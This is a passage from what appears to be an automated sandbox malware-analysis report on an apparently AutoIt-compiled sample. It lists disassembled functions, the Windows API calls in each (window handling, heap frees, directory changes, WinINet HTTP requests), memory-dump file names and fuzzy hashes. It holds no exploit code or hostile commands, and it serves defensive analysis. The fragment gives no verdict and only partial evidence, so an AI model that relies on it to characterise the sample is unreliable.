                                                                                                                  • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00B43BF6
                                                                                                                  • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00B43C13
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$LongWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 312131281-0
                                                                                                                  • Opcode ID: bf22b2cadcbb284e120cfa506f4f36f7016e11a65d6646f4b70a1af1aab7000b
                                                                                                                  • Instruction ID: 096c359c7a225fb1dc16f544389d936012444f36983ca604d1933dfa75f2178e
                                                                                                                  • Opcode Fuzzy Hash: bf22b2cadcbb284e120cfa506f4f36f7016e11a65d6646f4b70a1af1aab7000b
                                                                                                                  • Instruction Fuzzy Hash: B7615A75900248AFDB10DFA8CC81EEE77F8EB09710F144199FA15A72A2D774AE46EF50
                                                                                                                  Function 00AE2C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • _free.LIBCMT ref: 00AE2C94
                                                                                                                    • Part of subcall function 00AE29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00AED7D1,00000000,00000000,00000000,00000000,?,00AED7F8,00000000,00000007,00000000,?,00AEDBF5,00000000), ref: 00AE29DE
                                                                                                                    • Part of subcall function 00AE29C8: GetLastError.KERNEL32(00000000,?,00AED7D1,00000000,00000000,00000000,00000000,?,00AED7F8,00000000,00000007,00000000,?,00AEDBF5,00000000,00000000), ref: 00AE29F0
                                                                                                                  • _free.LIBCMT ref: 00AE2CA0
                                                                                                                  • _free.LIBCMT ref: 00AE2CAB
                                                                                                                  • _free.LIBCMT ref: 00AE2CB6
                                                                                                                  • _free.LIBCMT ref: 00AE2CC1
                                                                                                                  • _free.LIBCMT ref: 00AE2CCC
                                                                                                                  • _free.LIBCMT ref: 00AE2CD7
                                                                                                                  • _free.LIBCMT ref: 00AE2CE2
                                                                                                                  • _free.LIBCMT ref: 00AE2CED
                                                                                                                  • _free.LIBCMT ref: 00AE2CFB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 776569668-0
                                                                                                                  • Opcode ID: c911e1df2577868b928d8fde9274ca3e00832e6687cb4d949d6fd26371231007
                                                                                                                  • Instruction ID: e4fdf30b1053dc86afaa364b1e3f85260641b54348fa03c6414a5c3a72733e21
                                                                                                                  • Opcode Fuzzy Hash: c911e1df2577868b928d8fde9274ca3e00832e6687cb4d949d6fd26371231007
                                                                                                                  • Instruction Fuzzy Hash: 2111E67610014CBFCB02EF56DA82EDD3BA9FF45350F4254A0FA489F222DA35EE509B90
                                                                                                                  Function 00AB1410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00AB1459
                                                                                                                  • OleUninitialize.OLE32(?,00000000), ref: 00AB14F8
                                                                                                                  • UnregisterHotKey.USER32(?), ref: 00AB16DD
                                                                                                                  • DestroyWindow.USER32(?), ref: 00AF24B9
                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 00AF251E
                                                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00AF254B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                  • String ID: close all
                                                                                                                  • API String ID: 469580280-3243417748
                                                                                                                  • Opcode ID: 6af9f2638f1fcfd771f5b79775be41334ab20b2e2647b7ba5c8bd93d1c10c60f
                                                                                                                  • Instruction ID: d41d8276149ec9b90bef41e1cc98b0b6409555d86ee7166ab84ee2e3f318faf3
                                                                                                                  • Opcode Fuzzy Hash: 6af9f2638f1fcfd771f5b79775be41334ab20b2e2647b7ba5c8bd93d1c10c60f
                                                                                                                  • Instruction Fuzzy Hash: 45D18D31702222CFCB29EF54C5A9B69F7A8BF05700F5542ADE54AAB252CB30AD12CF50
                                                                                                                  Function 00B27DF0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00B27FAD
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00B27FC1
                                                                                                                  • GetFileAttributesW.KERNEL32(?), ref: 00B27FEB
                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 00B28005
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00B28017
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00B28060
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00B280B0
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CurrentDirectory$AttributesFile
                                                                                                                  • String ID: *.*
                                                                                                                  • API String ID: 769691225-438819550
                                                                                                                  • Opcode ID: 0a8410bd2feb0fe11f4316a5e61f1aa2a17fd3d55f6bd1f4dec9425bb9cb30c6
                                                                                                                  • Instruction ID: d2565f3a53e4564898f925998980d195dfce22d43828fe4a2521ccf602d7582d
                                                                                                                  • Opcode Fuzzy Hash: 0a8410bd2feb0fe11f4316a5e61f1aa2a17fd3d55f6bd1f4dec9425bb9cb30c6
                                                                                                                  • Instruction Fuzzy Hash: BD81CF725482519BCB20EF14D8849AFB3ECFF89310F15489EF889D7251EB34DD498BA6
                                                                                                                  Function 00AB5BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SetWindowLongW.USER32(?,000000EB), ref: 00AB5C7A
                                                                                                                    • Part of subcall function 00AB5D0A: GetClientRect.USER32(?,?), ref: 00AB5D30
                                                                                                                    • Part of subcall function 00AB5D0A: GetWindowRect.USER32(?,?), ref: 00AB5D71
                                                                                                                    • Part of subcall function 00AB5D0A: ScreenToClient.USER32(?,?), ref: 00AB5D99
                                                                                                                  • GetDC.USER32 ref: 00AF46F5
                                                                                                                  • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00AF4708
                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00AF4716
                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00AF472B
                                                                                                                  • ReleaseDC.USER32(?,00000000), ref: 00AF4733
                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00AF47C4
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                  • String ID: U
                                                                                                                  • API String ID: 4009187628-3372436214
                                                                                                                  • Opcode ID: 146089fbff78fb6f18575021f534dac37194ebcc8f01609f4b0a31646ec73de3
                                                                                                                  • Instruction ID: 2be4e7e51e5ec56b1e11bc86d9d7365a224cf0882046c9759ead09759df1725d
                                                                                                                  • Opcode Fuzzy Hash: 146089fbff78fb6f18575021f534dac37194ebcc8f01609f4b0a31646ec73de3
                                                                                                                  • Instruction Fuzzy Hash: 1571DF34800209DFCF219FA4C984AFB7BBAFF4A360F144269FE559A266C7318941DF50
                                                                                                                  Function 00B2359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 00B235E4
                                                                                                                    • Part of subcall function 00AB9CB3: _wcslen.LIBCMT ref: 00AB9CBD
                                                                                                                  • LoadStringW.USER32(00B82390,?,00000FFF,?), ref: 00B2360A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: LoadString$_wcslen
                                                                                                                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                  • API String ID: 4099089115-2391861430
                                                                                                                  • Opcode ID: 8204062d12c632675442db070b129a1406451e21d7709589a7b4bf3f75fe9f17
                                                                                                                  • Instruction ID: 3f3fe0c67eee2ff956777dc1a3b27c2321b66400aff8fb635f12f86ed0253137
                                                                                                                  • Opcode Fuzzy Hash: 8204062d12c632675442db070b129a1406451e21d7709589a7b4bf3f75fe9f17
                                                                                                                  • Instruction Fuzzy Hash: EC517F72800219BBCF15EBA0DD82EEEBBB8EF04700F544165F119721A2DB355B99DFA1
                                                                                                                  Function 00B48B02 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AC9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00AC9BB2
                                                                                                                    • Part of subcall function 00AC912D: GetCursorPos.USER32(?), ref: 00AC9141
                                                                                                                    • Part of subcall function 00AC912D: ScreenToClient.USER32(00000000,?), ref: 00AC915E
                                                                                                                    • Part of subcall function 00AC912D: GetAsyncKeyState.USER32(00000001), ref: 00AC9183
                                                                                                                    • Part of subcall function 00AC912D: GetAsyncKeyState.USER32(00000002), ref: 00AC919D
                                                                                                                  • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00B48B6B
                                                                                                                  • ImageList_EndDrag.COMCTL32 ref: 00B48B71
                                                                                                                  • ReleaseCapture.USER32 ref: 00B48B77
                                                                                                                  • SetWindowTextW.USER32(?,00000000), ref: 00B48C12
                                                                                                                  • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00B48C25
                                                                                                                  • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00B48CFF
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                                  • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                  • API String ID: 1924731296-2107944366
                                                                                                                  • Opcode ID: 3ddc7ff98de83faba5622304b402e26af6b1b7d60d6f63dddf228cdf9429f2e2
                                                                                                                  • Instruction ID: 4ca7114188a21ff34482b0fad45ea9fda37875073c546d94063106d6ae7e6085
                                                                                                                  • Opcode Fuzzy Hash: 3ddc7ff98de83faba5622304b402e26af6b1b7d60d6f63dddf228cdf9429f2e2
                                                                                                                  • Instruction Fuzzy Hash: B7518A71105304AFD700EF24CD96FAE7BE8FB88710F000A6DF996572A2CB719A15DB62
                                                                                                                  Function 00B2C253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00B2C272
                                                                                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B2C29A
                                                                                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00B2C2CA
                                                                                                                  • GetLastError.KERNEL32 ref: 00B2C322
                                                                                                                  • SetEvent.KERNEL32(?), ref: 00B2C336
                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00B2C341
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3113390036-3916222277
                                                                                                                  • Opcode ID: fd51b5ae4faff87f74b6c125439aae06bf11e79836bf0dbadc9b637d5cfecc84
                                                                                                                  • Instruction ID: a9f70120743e8771c1ccbc49bf1e926f011c78954205a99014a48b447440067b
                                                                                                                  • Opcode Fuzzy Hash: fd51b5ae4faff87f74b6c125439aae06bf11e79836bf0dbadc9b637d5cfecc84
                                                                                                                  • Instruction Fuzzy Hash: 96319CB1600618AFD721DFA4AC88AAF7FFCFB4A744B10895EF44A93200DB70DD448B65
                                                                                                                  Function 00B1989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00AF3AAF,?,?,Bad directive syntax error,00B4CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 00B198BC
                                                                                                                  • LoadStringW.USER32(00000000,?,00AF3AAF,?), ref: 00B198C3
                                                                                                                    • Part of subcall function 00AB9CB3: _wcslen.LIBCMT ref: 00AB9CBD
                                                                                                                  • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00B19987
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleLoadMessageModuleString_wcslen
                                                                                                                  • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                  • API String ID: 858772685-4153970271
                                                                                                                  • Opcode ID: 55c2c1071c57fa736cda96fe7978f2e518f669ec6cbfb44fd0425733967d2792
                                                                                                                  • Instruction ID: 474583ef2ddbd4435ffe0518752a961928322ddda3d37bc4608b69e787d07941
                                                                                                                  • Opcode Fuzzy Hash: 55c2c1071c57fa736cda96fe7978f2e518f669ec6cbfb44fd0425733967d2792
                                                                                                                  • Instruction Fuzzy Hash: 0E21913280021EBFCF15AF90CD56EEE7BB9FF18700F444499F519660A2EB319A58DB51
                                                                                                                  Function 00B1209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetParent.USER32 ref: 00B120AB
                                                                                                                  • GetClassNameW.USER32(00000000,?,00000100), ref: 00B120C0
                                                                                                                  • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00B1214D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ClassMessageNameParentSend
                                                                                                                  • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                  • API String ID: 1290815626-3381328864
                                                                                                                  • Opcode ID: b07f71fffe881ea975bb233b546b57b99d9e28b10bab6226f6fee28121810541
                                                                                                                  • Instruction ID: 0872b911bdb18501f9b4109acf7f2bac7bb3ee50e36288e71734a552b965f329
                                                                                                                  • Opcode Fuzzy Hash: b07f71fffe881ea975bb233b546b57b99d9e28b10bab6226f6fee28121810541
                                                                                                                  • Instruction Fuzzy Hash: 2D117A3A684302BAFA10A720DC06CFA37DCDB0A720B204096FB09B51F1FEB158B11514
                                                                                                                  Function 00AECE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1282221369-0
                                                                                                                  • Opcode ID: bb2ab027f1384b6b9b14774d422b261b8d8aa4704ca2dba11f68c3e756cfbd23
                                                                                                                  • Instruction ID: c9610b7a687d19cfc60fe5cd26e743aa8075e12d452078fd25f1331624f08769
                                                                                                                  • Opcode Fuzzy Hash: bb2ab027f1384b6b9b14774d422b261b8d8aa4704ca2dba11f68c3e756cfbd23
                                                                                                                  • Instruction Fuzzy Hash: 756167729043C4AFDB25AFBA9D81B6E7BA9EF05370F04416DF94197282EA319D02C790
                                                                                                                  Function 00B450D4 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00B45186
                                                                                                                  • ShowWindow.USER32(?,00000000), ref: 00B451C7
                                                                                                                  • ShowWindow.USER32(?,00000005,?,00000000), ref: 00B451CD
                                                                                                                  • SetFocus.USER32(?,?,00000005,?,00000000), ref: 00B451D1
                                                                                                                    • Part of subcall function 00B46FBA: DeleteObject.GDI32(00000000), ref: 00B46FE6
                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00B4520D
                                                                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00B4521A
                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00B4524D
                                                                                                                  • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00B45287
                                                                                                                  • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00B45296
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3210457359-0
                                                                                                                  • Opcode ID: 9433b96adb78505fcfc614f8130fb08d2d75e8e3eef4e519176701adb7d7392b
                                                                                                                  • Instruction ID: 5c28e8d4e4e487754d9e818dcc96c2c07dc6dd4a4a036101b2e30c34c930bfc6
                                                                                                                  • Opcode Fuzzy Hash: 9433b96adb78505fcfc614f8130fb08d2d75e8e3eef4e519176701adb7d7392b
                                                                                                                  • Instruction Fuzzy Hash: 48518230A41E08BFEF309F24CC49B993BE5FB05721F148096F515A62E2C7B59B80EB41
                                                                                                                  Function 00AC8B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00B06890
                                                                                                                  • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00B068A9
                                                                                                                  • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00B068B9
                                                                                                                  • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00B068D1
                                                                                                                  • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00B068F2
                                                                                                                  • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00AC8874,00000000,00000000,00000000,000000FF,00000000), ref: 00B06901
                                                                                                                  • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00B0691E
                                                                                                                  • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00AC8874,00000000,00000000,00000000,000000FF,00000000), ref: 00B0692D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
